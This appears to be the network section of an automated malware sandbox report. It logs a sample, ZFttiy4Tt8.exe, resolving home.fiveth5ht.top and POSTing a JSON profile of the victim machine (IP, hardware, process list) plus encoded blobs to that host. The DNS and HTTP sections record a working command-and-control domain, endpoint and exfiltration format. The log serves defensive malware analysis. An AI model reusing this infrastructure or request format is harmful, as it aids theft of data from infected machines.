                                                            Dec 28, 2024 09:53:33.417076111 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417081118 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417094946 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417151928 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417161942 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417181969 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417221069 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417249918 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417263031 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417295933 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417311907 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417325974 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417467117 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417485952 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417500973 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417562008 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417588949 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417629957 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417720079 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417723894 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417782068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417912006 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417924881 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418148994 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418248892 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418255091 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418396950 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418426991 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418551922 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418587923 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418663979 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418723106 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.418807030 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.421761036 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.460849047 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.460908890 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.492449999 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.493518114 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.536650896 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.536796093 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.536801100 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.536813974 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.536830902 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.536859989 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.536876917 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.536925077 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537009001 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537137032 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537141085 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537178040 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537256002 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537261963 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537317991 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537415981 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537487030 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537491083 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.537738085 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541471958 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541476965 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541481018 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541527987 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541532040 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541554928 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541558027 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541579008 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541614056 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541632891 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541678905 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541749001 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541755915 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541760921 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541815042 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541843891 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541914940 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.541959047 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541974068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541982889 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541985989 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541990042 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.541992903 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542028904 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.542095900 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542099953 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542157888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542162895 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542252064 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542295933 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542299986 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542372942 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542376995 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542454958 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542459011 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542570114 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542583942 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542722940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542737007 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542804003 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542808056 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542898893 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542902946 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.542929888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543021917 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543025970 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543102980 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543107033 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543111086 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.543113947 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.580662966 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.598784924 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.598926067 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.599003077 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.605838060 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.613014936 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.613147974 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656393051 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656398058 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656451941 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656455994 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656523943 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656527996 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.656532049 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657299042 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657303095 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657363892 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657366991 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657398939 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657463074 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657466888 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657507896 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657553911 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657609940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657613993 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657679081 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657682896 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657726049 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657857895 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657907963 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657987118 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.657990932 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658031940 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658035994 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658091068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658094883 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658137083 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658168077 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658200979 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.658205032 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661036015 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661040068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661089897 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661145926 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661209106 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661211967 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661277056 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661281109 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661293030 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661334038 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661410093 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661459923 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661519051 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661595106 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661598921 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661691904 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661696911 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661705971 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661710024 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661722898 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661731005 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661736965 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661802053 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661813021 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661879063 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661884069 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661976099 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.661984921 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.718415976 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.725331068 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:34.455370903 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.575001955 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:34.575176001 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.575469017 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:34.694976091 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843194008 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843298912 CET804972681.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:35.843511105 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:35.843813896 CET4972680192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:35.963231087 CET804972681.29.149.125192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 09:53:26.954652071 CET6153353192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:26.954799891 CET6153353192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:27.094289064 CET53615331.1.1.1192.168.2.6
                                                            Dec 28, 2024 09:53:27.094310999 CET53615331.1.1.1192.168.2.6
                                                            Dec 28, 2024 09:53:31.820557117 CET5202053192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:31.820679903 CET5202053192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:32.109877110 CET53520201.1.1.1192.168.2.6
                                                            Dec 28, 2024 09:53:32.117131948 CET53520201.1.1.1192.168.2.6
                                                            Dec 28, 2024 09:53:34.313625097 CET5202253192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:34.313694000 CET5202253192.168.2.61.1.1.1
                                                            Dec 28, 2024 09:53:34.454217911 CET53520221.1.1.1192.168.2.6
                                                            Dec 28, 2024 09:53:34.454251051 CET53520221.1.1.1192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 28, 2024 09:53:26.954652071 CET192.168.2.61.1.1.10x5779Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:26.954799891 CET192.168.2.61.1.1.10xbf5eStandard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 28, 2024 09:53:31.820557117 CET192.168.2.61.1.1.10x97faStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:31.820679903 CET192.168.2.61.1.1.10x79eStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 28, 2024 09:53:34.313625097 CET192.168.2.61.1.1.10x1b30Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:34.313694000 CET192.168.2.61.1.1.10x528cStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 28, 2024 09:53:22.124440908 CET1.1.1.1192.168.2.60xbbf1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 28, 2024 09:53:22.124440908 CET1.1.1.1192.168.2.60xbbf1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:27.094289064 CET1.1.1.1192.168.2.60x5779No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:27.094289064 CET1.1.1.1192.168.2.60x5779No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:32.117131948 CET1.1.1.1192.168.2.60x97faNo error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 09:53:34.454217911 CET1.1.1.1192.168.2.60x1b30No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.fiveth5ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.64972081.29.149.125805260C:\Users\user\Desktop\ZFttiy4Tt8.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 09:53:32.241182089 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 567271
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 32 34 36 33 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001246344", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
                                                            Dec 28, 2024 09:53:32.360850096 CET2472OUTData Raw: 78 37 34 42 62 55 42 71 78 38 44 2b 4e 50 46 50 68 41 36 71 4c 55 32 49 31 4d 2b 47 74 63 76 74 46 4f 6f 43 79 4e 78 64 6d 7a 46 36 62 4c 37 53 4c 55 33 64 31 39 6e 38 7a 79 76 74 45 32 7a 7a 47 5c 2f 61 50 42 58 36 56 33 67 44 39 49 6a 4d 73 36
                                                            Data Ascii: x74BbUBqx8D+NPFPhA6qLU2I1M+GtcvtFOoCyNxdmzF6bL7SLU3d19n8zyvtE2zzG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7L
                                                            Dec 28, 2024 09:53:32.360905886 CET7416OUTData Raw: 76 53 55 55 56 5c 2f 55 5a 5c 2f 4a 51 56 48 4a 32 5c 2f 48 2b 6c 53 55 55 41 56 66 6e 5c 2f 32 66 31 6f 2b 66 5c 2f 5a 5c 2f 57 6e 55 56 70 54 36 5c 2f 49 30 70 39 66 6c 2b 70 58 6f 71 56 2b 6e 34 5c 2f 30 4e 52 56 6f 64 46 50 72 38 68 6a 4b 5c
                                                            Data Ascii: vSUUV\/UZ\/JQVHJ2\/H+lSUUAVfn\/2f1o+f\/Z\/WnUVpT6\/I0p9fl+pXoqV+n4\/0NRVodFPr8hjK\/8A9bp\/P\/E1FVjy3Xnf\/n8ar0Gg09H\/AB\/9BFQ1Yqo\/T8f6Gg29\/wDu\/iPqOTt+NSU1\/un8P5igohopfKf\/AJ5j\/P4UlBpT6\/L9SOTt+P8ASo6lZscDr\/L\/AOvUVB0U+vyCq9WKjZe4\/H\/Gg0
                                                            Dec 28, 2024 09:53:32.360974073 CET2472OUTData Raw: 71 35 49 38 74 57 46 4c 38 53 66 2b 43 69 5c 2f 68 50 54 66 46 58 37 45 5c 2f 77 41 4a 66 32 69 49 50 69 46 38 51 66 47 39 6a 38 52 64 52 2b 46 2b 75 65 45 62 44 34 6a 65 47 66 68 4e 70 57 73 61 42 34 65 2b 4a 58 67 7a 55 76 47 6b 49 75 4a 5c 2f
                                                            Data Ascii: q5I8tWFL8Sf+Ci\/hPTfFX7E\/wAJf2iIPiF8QfG9j8RdR+F+ueEbD4jeGfhNpWsaB4e+JXgzUvGkIuJ\/AXg7Sruz1lbSzsLLU7G18Ralopka6UfbzDZ3sf8APtX9Df7aBx\/wR7\/YxH97wt+ykP8AzAert\/Sv56PL9\/0\/+vX+h\/0O8LSy\/gLjnLcO6jwuW+LPFGAwkak5VJU8Nhsp4ahThzPyvOVklKpOdRrmm2\/8r
                                                            Dec 28, 2024 09:53:32.361023903 CET2472OUTData Raw: 48 59 55 50 6e 2b 66 6a 37 5c 2f 41 46 36 64 42 5c 2f 6e 32 35 70 64 33 5c 2f 4c 50 74 5c 2f 77 44 57 2b 6c 57 66 4c 35 33 5c 2f 41 50 36 2b 76 58 36 5a 37 65 76 74 56 57 53 50 35 66 38 41 57 66 58 6e 50 2b 66 38 69 67 30 70 39 66 6c 2b 6f 65 5a
                                                            Data Ascii: HYUPn+fj7\/AF6dB\/n25pd3\/LPt\/wDW+lWfL53\/AP6+vX6Z7evtVWSP5f8AWfXnP+f8ig0p9fl+oeZ\/9t7dT+P8un41DI3mdc\/6z\/Pr70N0X\/rl\/QUz529v0\/8Ar0Ggsm7O7Zs\/7ZY\/z61Vw+N38X0746+vX2z3qWTt\/rO\/9KbIr8p15\/1n+f06\/wA6Dr535f18yvznfs\/7Z4\/cf\/q\/znNQfJ8\/+s7
                                                            Dec 28, 2024 09:53:32.361133099 CET4944OUTData Raw: 2b 59 44 4e 71 52 79 62 30 2b 63 66 36 32 58 5c 2f 70 74 2b 6e 39 63 64 2b 74 4c 75 5c 2f 64 75 45 38 7a 66 48 46 5c 2f 42 46 39 66 38 41 50 39 65 61 64 48 5c 2f 63 33 78 70 35 6b 58 2b 73 5c 2f 77 43 57 45 50 66 5c 2f 41 44 5c 2f 4d 55 7a 7a 50
                                                            Data Ascii: +YDNqRyb0+cf62X\/pt+n9cd+tLu\/duE8zfHF\/BF9f8AP9eadH\/c3xp5kX+s\/wCWEPf\/AD\/MUzzP3m\/fJ+ff+fXtVHQQyR+VsdMon\/onH19PpxQ8iN86JEjx\/uv9b+4m\/p9eafu+aN0X\/llcceUf8M0za\/yeX\/zy83\/nhP8An\/8AX6UAM8vzJEf7\/wC9\/wCPiM+vS6\/P+nSmfPDHB\/rNn+keV5f\/AF9
                                                            Dec 28, 2024 09:53:32.361174107 CET4944OUTData Raw: 4b 33 31 61 32 6a 74 31 56 6d 75 7a 59 36 44 72 75 71 36 32 31 6b 67 61 65 38 54 53 6e 74 62 53 4b 65 39 6d 74 37 65 58 36 39 2b 4f 66 77 6f 2b 46 50 5c 2f 42 57 58 39 6c 6e 34 61 65 4e 5c 2f 68 56 38 54 5a 66 42 32 75 61 50 72 56 68 34 38 2b 48
                                                            Data Ascii: K31a2jt1VmuzY6Druq621kgae8TSntbSKe9mt7eX69+Ofwo+FP\/BWX9ln4aeN\/hV8TZfB2uaPrVh48+H\/AIxsIxqV\/wCBfG9rYrDrvgzxdpdreWN7aX1hLPFBfizu7S9sdRsNH1\/TJtQ0swxap67\/AME13z+w3+z183\/MteIxjPp4\/wDFy+vtXkHj7\/gmjo9h8Qtd+LH7JXx6+JP7Hnjbxbdvf+L9L8A28Hib4WeJN
                                                            Dec 28, 2024 09:53:32.480648994 CET4944OUTData Raw: 75 32 2b 4b 65 6b 61 4e 38 4b 37 6a 34 69 57 6b 76 78 58 2b 44 66 78 44 76 66 67 31 38 57 5c 2f 44 6e 77 51 2b 4e 4f 6b 5c 2f 44 66 57 76 69 53 2b 73 66 43 66 34 68 65 4c 39 4f 38 56 36 6c 34 57 30 33 78 54 62 66 45 76 34 54 66 44 47 79 31 54 54
                                                            Data Ascii: u2+KekaN8K7j4iWkvxX+DfxDvfg18W\/DnwQ+NOk\/DfWviS+sfCf4heL9O8V6l4W03xTbfEv4TfDGy1TT9cTwN4rtLTXfAupeMdEi1HRprK9v7V7rTmvfiM\/wCOOE+FswynK+IM8weVY\/PZSjlWHxXtU8Xy4zL8uclUhSnSow\/tDNcswKqYipSpyxePweHjJ1cRShL\/ADE4Z8N+O+MsqzvO+F+G8dnOV8OU5Vc5xeE9i44
                                                            Dec 28, 2024 09:53:32.480691910 CET2472OUTData Raw: 6a 71 74 50 48 79 6b 71 56 4f 46 61 70 4b 4d 48 53 6f 72 4e 30 66 56 62 58 57 39 4c 73 4e 58 73 69 78 74 4e 52 74 6f 72 71 33 4c 44 44 47 4f 56 64 79 35 48 39 65 34 35 37 31 70 56 5c 2f 57 64 4f 70 43 72 43 46 57 6e 4a 54 70 31 49 52 71 55 35 78
